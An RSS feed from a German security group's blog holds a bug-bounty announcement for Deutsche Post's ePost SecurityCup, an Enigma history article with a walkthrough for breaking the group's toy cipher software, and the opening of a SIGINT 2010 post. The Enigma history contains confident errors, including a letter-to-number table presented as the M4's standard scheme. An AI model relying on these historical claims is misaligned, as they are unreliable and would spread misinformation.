<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title></title>
	<atom:link href="http://www.global-evolution.info/news/Index.php?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://www.global-evolution.info/news</link>
	<description></description>
	<lastBuildDate>Mon, 30 Aug 2010 21:28:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>ePost (DeutschePost) &#8211; SecurityCup Event 2010</title>
		<link>http://www.global-evolution.info/news/?p=1403</link>
		<comments>http://www.global-evolution.info/news/?p=1403#comments</comments>
		<pubDate>Fri, 20 Aug 2010 14:15:42 +0000</pubDate>
		<dc:creator>GE TEAM</dc:creator>
				<category><![CDATA[All]]></category>

		<guid isPermaLink="false">http://www.global-evolution.info/news/?p=1403</guid>
		<description><![CDATA[Einige Tage ist es nun her, dass die Registrierung für den neuen ePost SecurityCup Event eröffnet wurde. Am 9 August wurde die Registrierung für die Veranstaltung offiziell freigegeben. Der Start, des Events ist im Oktober also in ziemlich genau einem Monat. Die Registrierung läuft bis 2 Tage vor dem Start. Die Researcher haben  2 Monate [...]]]></description>
			<content:encoded><![CDATA[<p>Einige Tage ist es nun her, dass die Registrierung für den neuen ePost SecurityCup Event eröffnet wurde. Am 9 August wurde die Registrierung für die Veranstaltung offiziell freigegeben. Der Start, des Events ist im Oktober also in ziemlich genau einem Monat. Die Registrierung läuft bis 2 Tage vor dem Start. Die Researcher haben  2 Monate um Schwachstellen an die Deutsche Post (ePost) zu übermitteln. Die Tests werden von der Deutschen Post (ePost) authorsiert. Jedes Team erhält alle Komponenten &amp; Module in einem Account um eigene Sicherheitstests zu machen.</p>
<p><span id="more-1403"></span>Die Preise bei den Events liegen bei 1000€ für kleinere (client-seitige) Sicherheitslücken &amp; bei 5000€ für mittlere &#8211; kritische (Persistent or Server-Side; Design)Sicherheitslücken.</p>
<p style="text-align: center;"><a href="https://adresse-sichern.epost.de/"><img class="aligncenter" src="http://www.global-evolution.info/news/files/epost/1.png" alt="" width="596" height="525" /></a></p>
<p>Um euch die Spannung zu nehmen, &#8220;JA, wir machen mit!&#8221;. Gerade bei diesem Event sind es nicht nur die kommerziellen Preise die locken sondern die Möglichkeit etwas dauerhaft zu verändern, was bald voraussichtlich die Zukunft im Bereich, der Kommunikation bestimmt. Aus diesem Grund haben sich X4lt(GE) mit Rem0ve(GE), Emzy(CCC), Static(GE) &amp; Ric0(Flip-Dot) zusammen für diesen Event registriert. Bisher sind uns leider keine Details zugekommen von anderen befreundeten Gruppen die auch teilnehmen möchten.</p>
<p>Hiermit rufen wir alle interessierten Leser (Researcher-,Penetrationtester- &amp; seriöse Hacker) Gruppen dazu auf, sich für diesen SecurityCup Event zu registrieren. Jedes angenommene Researcher Team bekommt einen Startgeld von 3000 EURO. Das Geld bekommt man aber nicht einfach so sondern muss schon Referenzen für eine ernsthafte Teilnahme vorweisen können. Das Geld kann &amp; sollte für Equipment, Software, Scripts &amp; ePost zubehör ausgegeben werden um die Wahrscheinlichkeit eines Treffers zu erhöhen &amp; die Aufwendungen vorab zu vergüten.</p>
<p>Wir waren alle extrem erstaunt von der &#8220;DeutschenPost&#8221; den sie haben nun genau den richtigen Weg zum Schutz von Infrastrukturen eingeschlagen. Es kommt nicht oft vor das eine so große Bank eine Möglichkeit für unabhängigen Researcher anbietet. Vor allem ist man bei dieser Aktion nicht in einer doppelt abgesicherten Testumgebung unterwegs sondern macht alle Sicherheitstests über das Live-System. Ziel dabei ist es unter anderem eine Sicherheitslücke nicht umbedingt schadhaft auszunutzen sondern eher das Problem zu identifizieren &amp; zu dokumentieren.</p>
<p style="text-align: center;"><a href="https://adresse-sichern.epost.de/"><img class="aligncenter" src="http://www.global-evolution.info/news/files/epost/2.png" alt="" width="607" height="529" /></a></p>
<p>Am Ende werden alle Einreichungen an eine Jury übergeben. Diese wertet die Dokumente oder Sessiondaten aus &amp; verteilt dann die Vergütungen. Die Sicherheitslücken müssen alle gut &amp; verständlich dokumentiert sein &amp; klare sowie zutreffende Aussagen beinhalten. Die Jury besteht aus folgenden Personen &#8230;</p>
<p style="text-align: left;"><a href="https://adresse-sichern.epost.de/"><img class="alignleft" src="http://www.global-evolution.info/news/files/epost/3.png" alt="" width="326" height="245" /></a></p>
<p>Wer die Webseite besuchen möchte kann dem folgenden Link folgen &#8230;<br />
<a href="https://www.deutschepost.de/dpag?tab=1&amp;skin=hi&amp;check=yes&amp;lang=de_EN&amp;xmlFile=link1022792_1022790"> https://www.deutschepost.de/dpag?tab=1&amp;skin=hi&amp;check=yes&amp;lang=de_EN&amp;xmlFile=link1022792_1022790</a></p>
<p>Wichtige Auflagen für die Teilnahme an der Veranstaltung sind z.B. das alle gefundenen Sicherheitslücken über die DeutschePost angenommen, ausgebessert &amp; veröffentlicht werden. Das willkürliche veröffentlichen führt zu Disqualifizierung der entsprechenden Researcher/Gruppe.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.global-evolution.info/news/?feed=rss2&amp;p=1403</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ENIGMA &#8211; Software,Chiffrierung &amp; Codebreak Lecture</title>
		<link>http://www.global-evolution.info/news/?p=1346</link>
		<comments>http://www.global-evolution.info/news/?p=1346#comments</comments>
		<pubDate>Sun, 06 Jun 2010 21:36:30 +0000</pubDate>
		<dc:creator>GE TEAM</dc:creator>
				<category><![CDATA[All]]></category>

		<guid isPermaLink="false">http://www.global-evolution.info/news/?p=1346</guid>
		<description><![CDATA[Da wir  in Deutschland an der Quelle des damaligen Übels saßen, haben wir uns gedacht euch ein älteres Projekt von uns zugänglich zu machen. Um erst einmal zu verstehen was die Enigma eigentlich ist und wofür sie benutzt wurde im 2. Weltkrieg solltet ihr folgende Informationen wissen. Die ENIGMA ist eine Rotor basierte Schlüsselmaschine, die [...]]]></description>
			<content:encoded><![CDATA[<p>Da wir  in Deutschland an der Quelle des damaligen Übels saßen, haben wir uns gedacht euch ein älteres Projekt von uns zugänglich zu machen. Um erst einmal zu verstehen was die Enigma eigentlich ist und wofür sie benutzt wurde im  2. Weltkrieg solltet ihr folgende Informationen wissen. Die ENIGMA ist eine Rotor basierte Schlüsselmaschine, die im Zweiten Weltkrieg im Nachrichtenverkehr der deutschen Streitkräfte verwendet wurde. Dienstellen wie z.B. Marine, Geheimdienste, diplomatische Instanzen und Reichsbahn setzten die ENIGMA zur geheimen Kommunikation ein. Das Wort Enigma kommt aus dem Griechischen und bedeutet &#8220;Rätsel&#8221;.</p>
<p><span id="more-1346"></span>Der Erfinder, der ENIGMA war der deutsche Elektroingenieur Arthur Scherbius (1878–1929) Zur Fertigung der Maschine wurde am 9. Juli 1923 die Chiffriermaschinen-Aktiengesellschaft in Berlin gegründet. Die ENIGMA war zunächst als ziviles Chiffriersystem konzipiert und wurde kommerziell auf Messen – wie 1923 auf dem internationalen Postkongress des Weltpostvereins in Bern, zum Kauf angeboten. Kurze Zeit später zeigte jedoch das deutsche Militär(Wehrmacht) mehr als großes interesse, an dieser Chiffrierungs-Technologie. Der Erfinder &amp; Inhaber, des Patents Arthur Scherbius kam kurze  Zeit später(1929) bei einem Unfall mit einer Kutsche ums Leben. Bis heute ist nicht bekannt ob dieser Tot mit dem deutschen Reich auf Grund, Patents in Verbindung steht. Seine Erfindung galt damals als großer Fortschritt im Bereich der Chiffrierung &amp; Kryptographie. Im Jahre 1923 wurde das Patent für die erste ENIGMA von Arthur Scherbius angemeldet.</p>
<p>Die amerikanischen &amp; englischen Truppen hatten es zur damaligen Zeit extrem schwer den Code wegen der wechselnden Schlüssel via Walzen zu knacken. Außerdem waren z.B. extra Kerben, Markierungen &amp; Kennzeichen gesetzt worden wie bei der M4(Typus) die bei der Marine(z.B. U-Boot) genutzt wurde. Die allierten Mächte versuchten vor und während des Kriegs mehrfach mit verschiedensten &amp; sehr kostenintensiven Mitteln an eine aktuelle Enigma zu kommen.</p>
<p><strong>Wie funktionierte die ENIGMA ?</strong></p>
<p>Die Enigma arbeitet mit einem Walzensatz der als Hauptteil des Chiffriergeräts gilt. Strom fließt über eine Batterie ins Steckerbrett und vertauscht dann über die Walze einen gedrückten Buchstaben so, dass bei einer Eingabe von z.B. &#8220;A&#8221;  der Buchstabe &#8220;01&#8243; oder&#8221;T&#8221; heraus kommt. Für jede staatliche Instanz wie z.B.  Reichsbahn, Marine, Ämter oder Geheimdienste gab es verschiedene Schlüssel. Die Standardmakse, der ENIGMA M4(Marine) Gebrauchsanleitung war z.B.</p>
<p><strong>A=01 ; B=02 ; C=03; D=04; E=05;F=06;G=07;H=08;I=09</strong></p>
<p>&#8230; &amp; kann auf dem zweiten Bild(Gebrauchsanleitung) angeschaut werden. Die Verschlüsslungen konnten beliebig kombiniert und ausgetauscht werden. Diese Tatsache machte es damals schwer einzelne abgefangene Nachrichten nach einem festen Schema zu dechiffrieren, was wohl auch am meisten Zeit in Anspruch nahm.</p>
<p><strong>Wie sicher war die ENIGMA Chiffrierung (1923-1943)?</strong></p>
<p>Die Sicherheit, der verschlüsselten Nachrichten über die ENIGMA war damals von der Geheimhaltung der veränderbaren Walzenverdrahtungen ab. Der Anwender, des Chiffriergeräts konnte die Verdrahtungen nicht verändern und deshalb war ein Teil, des Algorithmus ebenfalls unveränderbar. Von 1923 &#8211; 1942 änderten sich die Walzenanzahlen variablen zwischen 3 &#8211; 8 &amp; konnten somit mehr Sicherheit gewährleisten. Ein große Schwäche der ENIGMA tritt dann auf wenn ein Gerät den Besitzer wechselt. Dann konnte man mit einer Methode die Walzen umkehren und so den vorab aufgefangenen Nachrichtenverkehr dechiffrieren. Dies ging aber nur dann, wenn die abgefangenen chiffrierten Nachrichten mit der unter Kontrolle gebrachten ENIGMA aus der amtlichen Instanz übereinstimmten. Anfänglich wurden keine Sicherheitsmaßnahmen im Verkehr mit der ENIGMA ergriffen aber nachdem einige Geräte &amp; Pläne über Spione, den Besitzer gewechselt hatten, wurde erst jedes halbe Jahr und dann pro Quartal die Routinen, der ENIGMA verändert.</p>
<p><strong>Wer knackte die ENIGMA ?</strong></p>
<p>Marian Rejewski arbeitete 1932 beim polnischen Chiffrierbüro im Sächsische Palaisin in Warschau für den polnischen Geheimdienst. 1931 wurde er vom polnischen Geheimdienst angeworden &amp; schon 1932 in ein Chiffrierbüro versetzt, wo inoffziell an der Decodierung, der ENIGMA gearbeitet wurde. Als Hauptwerkzeug benutzte er 2 konstruierte elektromechanische Maschinen die automatisiert rechneten und versuchten den aktuellen Tagesschlüssel verschiedenster Instanzen zu errechnen. Das erste Geräte mit dem gearbeitet wurde waren &#8220;<a href="http://de.wikipedia.org/wiki/Bomba">Bomba</a>&#8220;. Der Bomba ist ein Gerät aus 6 polnischen ENIGMA&#8217;s weiter entwickelt wurde. In zwei Stunden konnte das selbst erstellte Modell ungefair 17.576 Permutationen (Walzenstellungen) testen und den Tagesschlüssel von Heer und Luftwaffe mit Beaufsichtigung(optische Prüfung)  auswinding machen. Auf die heutigen Angriffe bezogen wäre es eine Art Bruteforce Attacke gewesen, weil alle Schlüsselkombinationen durchprobiert wurden, anstatt den Code per Wahrscheinlichkeit zu dechiffrieren.</p>
<p>Das zweite nützliche Gerät war ein <a href="http://de.wikipedia.org/wiki/Zyklometer_%28Kryptologie%29">Zyklometer</a> was von einigen Mathematikern entwickelt wurde um chiffrierte Funksprüche zu dechiffrieren. Das Zyklometer wurde dann benutzt wenn Bomba den aktuellen Tagesschlüssel per &#8220;Bruteforce&#8221; ermittelt hatte &amp; eignete sich wunderbar um Funksprüche abzuhören. Obwohl die Schlüssel später also automatisiert(ModelM) abgefragt wurden basiert seine Arbeit auf einem hoch kryptographischem Verständnis und er genießt bis heute höchste Anerkennung bei Krypto-Analysten in aller Welt.</p>
<p>Die hoch intelligenten Angriffsmethoden, des Polen blieben der Öffentlichkeit nicht lange verborgen und so orientierten sich selbst die Amerikaner &amp; Engländer an seinen Vorträgen/Berichten um die Schlüssel permanent zu knacken. Ob das knacken der ENIGMA mit den von einem deutschen Spion zusammenhängt, der an den franzosischen Geheimdienst Material verkauft hatte wird wohl für immer ein Rätsel bleiben. Nach dem Erwerb der Mittel vom französischen Geheimdienst wurde alles an den polnischen und engländischen Geheimdienste weitergeleitet. Dem engländischen Geheimdienst war es trotz der Unterlagen &amp; Bauteile bis Ende 1941 nicht wirklich möglich Nachrichten zuverlässig zu dechiffrieren. Nachdem die Amerikaner, die ENIGMA komplett geknackt hatten konnten Sie ihr wissen am &#8220;D-Day&#8221;(Operation Overlord) in der Normandie verwenden um höchst mögliche Präzision &amp; Koordination während des Angriffs gegen die deutschen Besatzer freizusetzen. Obwohl das amerikanische &amp; englische Militär viel Geld &amp; Material investierte um die verschiedenen ENIGMA Typen &amp; Codes zu erbeuten, gelang es erst 1941 im Hut6 in Bletchley Park, (Leitung: Gordon Welchman|8.Dezember) alle Codes, der ENIGMA M4/M3/G3 (Marine) zu knacken. Von diesem Zeitpunkt ab war die ENIGMA kein Hindernis mehr für die allierten Truppen im 2.Krieg &amp; alle Nachrichten konnten bis zum Ende des Kriegs abgehört/ausgewertet werden.</p>
<p><strong>Wurde der Kriegsverlauf durch die ENIGMA entschieden oder Beeinflusst?</strong></p>
<p>Einige Schreiber auf Wikipedia &amp; Webportalen behaupten, dass der Krieg nur wegen der geknackten Chiffriermaschine gewonnen wurde. NEIN! Bei einem deutlichen Blick in die heutigen Zahlen &amp; analysierten Fakten  kann man dieser Meinung nicht zustimmen, da die deutschen Truppen auch so schon am Ende Ihrer Ressourcen &amp; Koordination waren. Das es den Allierten einen großen taktischen Vorteil erbrachte ist jedoch nicht zu bezweifeln. Natürlich konnten die Amerikaner, Russen &amp; Engländer viel von dem chiffrierten Datenverkehr auswerten und nutzen, die kriegerische Auseinandersetzung wäre aber trotzdem auch ohne ENIGMA schlecht für die Nationalsozialisten ausgegangen. Trotzdem haben die allierten Streitkräfte viele Leben &amp; eine Menge Zeit mit dieser Art, des Lauschangriffs gespart. Die verschiedenen Enigma Typen kann man heute noch im Technikmuseum in Berlin oder im Verkehrsmuseum Berlin betrachten. Da wir 2007 in genau diesem Technikmuseum zu besuch waren haben wir natürlich 1a Fotos gemacht. Das folgende Bild zeigt die Enigma M4 welche von Marine oder Militär genutzt wurde und durch spezielle Walzen, ein Steckerbrett + Markierungen eine etwas bessere Verschlüsslung ermöglichte.</p>
<p>Das erste Bild zeigt die ENIGMA als Typ-M4 von der damaligen deutschen Marine &amp; bietet auf Grund der speziellen Kerben, Steckerbrett &amp; Walzen ein (damals) Höchstmaß an Verschlüsslung im Nachrichtenverkehr. (Foto by ~Rem0ve)</p>
<p><a href="http://www.global-evolution.info/news/files/enigma/1.jpg"><img class="alignnone" title="ENIGMA - TM BERLIN by Rem0ve" src="http://www.global-evolution.info/news/files/enigma/1.jpg" alt="" width="630" height="335" /></a></p>
<p>Das zweite Bild zeigt den Text auf der innen-seite der Enigma. Dieser spezielle Text ist in sämtlichen öffentlichen Quellen nur undeutlich oder garnicht zu erkennen. Er beinhaltet die wichtige Gebrauchsanweisung, des Chiffriergeräts. Bei einigen freien Bildern wurden die Metalplatten mit der Gebrauchsanweisung, der Maschinen gänzlich entfernt. Wenn man sich den Gebrauchs-anweisungspunkt Nr.6(Mitte) in einer höheren Auflösung(Zoom) anschaut dem wird ein kreisrunder Abdruck auffallen.</p>
<p><a href="http://www.global-evolution.info/news/files/enigma/2.jpg"><img class="alignnone" title="Gebrauchsanweisung Model (H. DV. g.13)" src="http://www.global-evolution.info/news/files/enigma/2.jpg" alt="" width="630" height="335" /></a></p>
<p>Diese Abdrücke stammen sehr wahrscheinlich von einer Umkehr-Walze die irgendwie mal auf der Klappe gelegen hat. <a href="http://upload.wikimedia.org/wikipedia/commons/3/33/EnigmaReflector.jpg">http://upload.wikimedia.org/wikipedia/commons/3/33/EnigmaReflector.jpg<br />
</a></p>
<p><strong>Projekt: Software &amp; Dechiffrierung</strong></p>
<p>Nun kommen wir aber mal zu dem Projekt, was wir zur ENIGMA vor einigen Jahren gemacht haben. 2 Mitglieder aus unserer Gruppe hatten damals ein Konzept &amp; ein Programm zur Enigma geschrieben was z.B. Dateiverschlüsslung, Texte &amp; Zahlen mit Hilfe von simulierten Rotationen verschlüsselt. An sich ist das Projekt sehr interessant weil der Source direkt im Programm verfügbar ist. Wer aber möchte kann sich selber mal im knacken des Rotations Rythmus versuchen ohne den Source vorher anzuschauen. Wer es schafft eine automatisierte Routine zu schreiben oder den Code auf einem Blatt Papier mit der Software zu knacken, kann sich gerne per code-paste in den Kommentaren auslassen. Interessant ist bei der Software, dass man sie für Schulungszwecke perfekt benutzen könnte da man damit die ersten Schritte(Basics) bei Codebreakern überprüfen/testen könnte. Eine Person die den Code vorher nicht kannte und mittlere Vorkenntnisse hatte konnte das Program nach 11 Stunden komplett dechiffrieren und automatisiert entschlüsseln. Natürlich ohne auf den verlinkten Source zuzugreifen. Um es ein wenig spannender zu machen haben wir natürlich noch eine Verschlüsslung für Dateien implementiert. Das Programm ist einfach gehalten kann Dateien &amp; Anhänge  verschlüsseln. Das Programm verfügt über 3 festgelegte Rythmen die man  über Rotationen benutzen/kombinieren kann.</p>
<p>Die folgenden Bilder stammen aus der Bearbeitungsphase, der Programmoberfläche &#8230;</p>
<p><a href="http://www.global-evolution.info/news/files/enigma/4.png"><img class="alignnone" title="phase4" src="http://www.global-evolution.info/news/files/enigma/4.png" alt="" width="630" height="335" /></a></p>
<p><a href="http://www.global-evolution.info/news/files/enigma/3.png"><img class="alignnone" title="phase3" src="http://www.global-evolution.info/news/files/enigma/3.png" alt="" width="630" height="335" /></a></p>
<p>Es folgen zwei Downloads einmal die einzelne Software &amp; dann noch das komplette Paket mit allen Daten am Ende(Source, Routine &amp; Projekt).</p>
<p><strong>Download:</strong> <a href="http://www.global-evolution.info/news/files/enigma/Program.rar">Software</a><br />
<strong>Download: </strong><a href="http://www.global-evolution.info/news/files/enigma/ALL.rar">Complete Package</a></p>
<p><strong>Wie bricht man die Chiffrierung (Verschlüsslung)in der vorgegebenen Software?</strong><br />
Als aller erstes stellt man einmal fest, ist die Verschlüsslung in der Software konstant(fest) oder ist sie generiert/berechnet.</p>
<p>Das lässt sich feststellen indem man 2 mal die gleiche Eingabe verschlüsselt mit einem Rotor. Wenn dabei 2 mal das gleiche raus kommt weiss man, dass der Wert fest vergeben ist. Um das zu verifizieren versucht man es natürlich noch ein drittes mal. Danach macht man das gleiche mit Rotation 2 &amp; Rotation 3.</p>
<p>Man kann mit der software zwar den konstant vergeben wert von generiert &amp; berechnet trennen(per Eingabe) aber nicht das generiert oder brechnet von einander. Es würde also optisch keine Unterschied machen ob man nun von einem berechneten Wert Zahlen/Buchstaben sehen oder ob man einfach generierte per zufall sieht. In diesem Falle könnte man beim Entschlüsseln nicht sehen ob eine Chiffrierung fest vergeben ist pro Rotor oder nicht. Bei der festen Vergabe allerdrings kann man den Code in wenigen Stunden komplett entschlüsseln, wenn man an die Software ran kommt. Das amerikanische, engländische &amp; russische Militär verfolgte natürlich die gleiche Stategie zwischen 1939 bis 1941, wo die Chiffrierung am Ende  komplett geknackt war.</p>
<p>Man nimmt sich ein Blatt und fängt an die einzelne Eingaben zu machen wie z.B. A=? ; B=?; C=?   &#8230; nachdem man den ersten Rotor checked findet man heraus das dieser die Buchstaben einfach in Zahlen umwandelt. Den für A B C D steht bei Rotation1  A=01; B=02; C=03; D=04. Wenn man seine Maske auf dem Netz-Blatt nun mit den Tastaturzeichen Testet wird man am Ende bei Rotation1 eine komplett neue Dechiffriert Maske erhalten.</p>
<p><strong>Rotation 1:</strong><br />
a = 01<br />
b = 02<br />
c = 03<br />
d = 04<br />
e = 05<br />
f = 06<br />
g = 07<br />
h = 08<br />
i = 09<br />
j = 10<br />
k = 11<br />
l = 12<br />
m = 13<br />
n = 14<br />
o = 15<br />
p = 16<br />
q = 17<br />
r = 18<br />
s = 19<br />
t = 20<br />
u = 21<br />
v = 22<br />
w = 23<br />
x = 24<br />
y = 25<br />
z = 26<br />
1 = 0a<br />
2 = 0b<br />
3 = 0c<br />
4 = 0d<br />
5 = 0e<br />
6 = 0f<br />
7 = 0g<br />
8 = 0h<br />
9 = 0i<br />
0 = 0j</p>
<p>Auf Rotation 1 ohne kombination wurde das Wort &#8220;hallo&#8221; chiffriert 0801121215 heißen. Erste Rotation haben wir schonmal geknackt war auch relativ einfach wenn man nicht die Berechnungstricks umgeht und indem man den schnellen Weg wählt. Nun kommen wir zur zweiten Rotation. Um als erstes festzustellen um die Werte auch hier konstant vergeben werden &#8230; testen wir mit unseren einfachen und beliebten Methode indem wir einfach 3 Eingaben verschlüsseln. Wie wir festellen werden ist auch diese chiffrierte Ausgabe konstant vergeben. Nun legen wir uns wieder eine einfache Netz-Maske und zeichnen die Eingaben für alle aufm dem keyboard anfallenden Zeichen an. Am Ende haben wir herausgefunden das A B C D chiffriert für A=ghi; B=dmp; C=klz; D=iso; steht. Nach wenigen Minuten haben wir eine nette Maske erstellt &#8230;</p>
<p><strong>Rotation </strong><strong>2:</strong></p>
<p>a = ghi<br />
b = dmp<br />
c = klz<br />
d = iso<br />
e = nke<br />
f = fqy<br />
g = vel<br />
h = zek<br />
i = dew<br />
j = psi<br />
k = pxh<br />
l = asm<br />
m = uts<br />
n = qda<br />
o = kla<br />
p = dak<br />
q = heu<br />
r = jub<br />
s = mvc<br />
t = cyw<br />
u = qlm<br />
v = dar<br />
w = raz<br />
x = ioz<br />
y = mzu<br />
z = wlb<br />
1 = tmp<br />
2 = ujd<br />
3 = ksz<br />
4 = bpe<br />
5 = yte<br />
6 = qpb<br />
7 = fgv<br />
8 = pqe<br />
9 = dsk<br />
0 = tpq</p>
<p>Nun tun wir das gleiche noch mit der letzten Maske und erhalten z.B. &#8230;</p>
<p><strong>Rotation </strong><strong>3:</strong></p>
<p><strong></strong>a = 4618<br />
b = 8122<br />
c = 5125<br />
d = 6124<br />
e = 1692<br />
f = 5921<br />
g = 7751<br />
h = 6614<br />
i = 6265<br />
j = 7501<br />
k = 8691<br />
l = 9592<br />
m = 0024<br />
n = 6813<br />
o = 8591<br />
p = 7602<br />
q = 8575<br />
r = 3125<br />
s = 5142<br />
t = 8251<br />
u = 1157<br />
v = 2151<br />
w = 5821<br />
x = 9915<br />
y = 2061<br />
z = 6021<br />
1 = b1z5<br />
2 = z9v2<br />
3 = s5g0<br />
4 = j8c6<br />
5 = b4r2<br />
6 = m1h9<br />
7 = x3c5<br />
8 = r7w8<br />
9 = q2a7<br />
0 = i3e2</p>
<p><strong>Kombinierte Rotation  dechiffrieren?</strong></p>
<p>Wer sich nun denkt das er die komplette Verschlüsslung schon gebrochen hat muss vorerst noch bedenken, dass es wichtig ist auch kombinierte Chiffrierungen zu testen. Es könnte ja sein, das ein Sender eine doppelte oder dreifache Rotation in einer Nachricht verwendet &amp; der Empfänger die standard Rotationsfolge kennt.</p>
<p><strong>Sender &#8211; Kombinierte Eingaben:</strong></p>
<p>Also machen wir die Eingabe im Programm &#8230; &#8220;Hallo&#8221; und erhalten &#8220;<strong>0801121215</strong>&#8220;(chiffriert rotation 1)</p>
<p>Nun nehmen wir als potenzieller Sender eine weitere Rotation vor. Wir kombinieren den chiffrierten Zahlencode aus Rotation1 mit der Rotation3 &amp; erhalten vollgende Ausgabe &#8230;</p>
<p>&#8220;<strong>i3e2r7w8i3e2b1z5b1z5z9v2b1z5z9v2b1z5b4r2</strong>&#8220;(chiffriert rotation 3).</p>
<p><strong>Angreifer &#8211; Merkmale &amp; Maske:</strong><br />
Da die Angreifer meistens die Funksprüche mit zyklometern abhören konnten, fangen wir in diesem scenario die obere letzte Nachricht verschlüsselt ab. Wir wissen nun aus unseren 3 Netz-Masken woran wir welche Rotation erkennen können, durch die erbeutete Enigma(Software|Example) versuchen wir nun den aktuellen Tagesschlüssel(Rotation) zu knacken.</p>
<p><strong>1.</strong> Rotation 1 enthält nur Zahlen die mit A=01 fortlaufenden beginnen. Merkmal: 2 Zahlen<br />
<strong>2.</strong> Rotation 2 enthält nur Buchstaben die mit A=ghi nicht forlaufend(random) beginnen. merkmal: 3 Buchstaben<br />
<strong>3.</strong> Rotation 3 enthält Zahlen, Buchstaben &amp; mix Zahlenfolgen. Merkmal: 4 zeichen &amp; Ab zahlen &#8211; Buchstaben &amp; Zahlen</p>
<p>Wir nehmen uns nun mit Hilfe, der Netz-Maske einfach einen verschlüsselten Text vor der wie folgt aussieht &#8230;</p>
<p>&#8220;<strong>b1z5z9v2i3e2b4r2i3e2b1z5b1z5r7w8b1z5j8c6 i3e2r7w8b1z5b4r2z9v2s5g0 z9v2i3e2b1z5b4r2 i3e2z9v2b1z5r7w8i3e2b4r2i3e2b1z5b1z5b1z5 i3e2b1z5<br />
i3e2z9v2i3e2b1z5b1z5q2a7i3e2q2a7i3e2s5g0 i3e2s5g0b1z5b4r2i3e2j8c6i3e2b4r2</strong>&#8221;</p>
<p>Wie wir sehen und im Program schon getestet haben wissen wir das die letzte ein Mix-Rotation ist. Wir schauen in die Merkmale(3.) und finden heraus, dass es nur Rotation 3 sein kann weil nur dort Zeichen und Buchstaben verwendet werden. Wir nehmen nun die Netz-Maske und dechiffrieren den verschlüsselten Text und erhalten dabei den folgenden String(chiffriert)</p>
<p>&#8220;<strong>1205011814 081523 2015 0218050111 01 0201190903 03150405</strong>&#8221;</p>
<p>Nun schauen wir uns den String an und vergleichen ihn mit den 3 möglichen Merkmalen. Wie wir sehen kann es nur noch die Rotation 1 sein weil nur diese einfach Zahlen besitzt. Wir nehmen also die Netz-Maske von Rotation1 die wir entschlüsselt haben und ersetzen die Zahlenkette durch die entschlüsselten Buchstaben. Wir erhalten folgenden Text:  &#8220;learn how to break a basic code&#8221; Nun kann man sich noch entscheiden ob man alles automatisiert mit ein wenig Zeitaufwand so gestaltet, dass wenn man einen Text einträgt er die Rotation erkennt und dann die jeweiligen Texte so lange ummodeliert bis der richtige Text auf dem Bildschrim erscheint. Die Attacke kann man mit Koordinaten oder mit einem Wörterbuch nochmals kombinieren werden damit man ohne zu überprüfen später bei einem sinnvollen Wort ein dechiffrierten Text automatisiert am Ende bekommt. Wenn man z.B. eine Wörterbuch attacke macht würden die wörter break, basic &amp; code zu 99% am Ende dort stehen. Diese beiden Wörter wurden als erstes von unserer Testperson identifiziert.  Diese Art von Angriff ist aber nur da sinnvoll wo man weiss was für eine Nachricht vom Empfänger entsendet wurde.</p>
<p>Es könnten theoretisch auch Signale oder Frequenzen sein die übertragen werden. Damals natürlich eine noch undenkbare Methode, den Code zu knacken weil man damals</p>
<p>nicht den Stand von heute hat. Sollte ihr jedoch den alten Weg wählen empfehle ich euch zu bedenken das Ihr bisher nur eine feste routine dechiffiert habt und das automatisierte etwas mehr an Aufwendung umfängt. Wer nun noch prüfen möchte ob er verstanden hat wie man nur mit der Verschlüsslungsfunktion sehen kann wie man den Code schnell brechen kann sollte sich mal bei dem folgenden Beispiel versuchen &#8230; http://www.java-fun.de/java/scripts/sicherheit/krypt.htm Krypt chiffriert per Javascript einen Texte in Zahlenzeichenketten. Die stabile Zahlenverschlüsslung basiert auf dem gleichen Technik einer einzigen Rotation &amp; kann in wenigen Minuten per Netz-Maske komplett dechiffriert werden.</p>
<p><strong>Beispiel: </strong></p>
<p><strong>1173750481049711810137504898114111107101110375048116104101375048110117</strong></p>
<p><strong>1099810111437504897108103111114121116104109</strong></p>
<p>An sich hat uns das Projekt viel Spaß gemacht, dass war auch ein Grund warum wir es nachträglich den Lesern zugänglich machen. Eine nette Programmversion wurde der privacy website bei cyberarmy an rose übermittelt um einen Aufsatz für Chiffrierung in England zu vervollständigen. Vor einigen Tagen wurde bekannt das in Bletchley Park alle <a href="http://news.bbc.co.uk/2/hi/uk_news/10239623.stm">ENIGMA Dokumente digitalisiert</a> werden sollen. Dazu werden freiwillige gesucht die ggf. mit Scannern kostenlos versorgt werden. Noch mehr Informationen &amp; einige interessante Bilder könnt ihr bei <a href="http://de.wikipedia.org/w/index.php?title=Enigma_%28Maschine%29&amp;stable=0&amp;shownotice=1#Weblinks">Wikipedia</a> finden. Die Bilder von ~rem0ve wurden zur Vervollständigung an das Wikipedia  Archiv weitergeleitet.</p>
<p>[<strong>Writer:</strong> ~Rem0ve &amp; ~X4lt]</p>
]]></content:encoded>
			<wfw:commentRss>http://www.global-evolution.info/news/?feed=rss2&amp;p=1346</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>SIGINT 2010 &#8211; Event, Meeting &amp; Propaganda</title>
		<link>http://www.global-evolution.info/news/?p=1333</link>
		<comments>http://www.global-evolution.info/news/?p=1333#comments</comments>
		<pubDate>Tue, 25 May 2010 16:07:25 +0000</pubDate>
		<dc:creator>GE TEAM</dc:creator>
				<category><![CDATA[All]]></category>

		<guid isPermaLink="false">http://www.global-evolution.info/news/?p=1333</guid>
		<description><![CDATA[This year was the same like other year at the event. But after being spammed 9 emails within one minute by CCC SIGINT, we decided that we should at least show our faces at the event. The subject from the emails where Call for Paper for the SIGINT2010 event. But because we sadly enough we [...]]]></description>
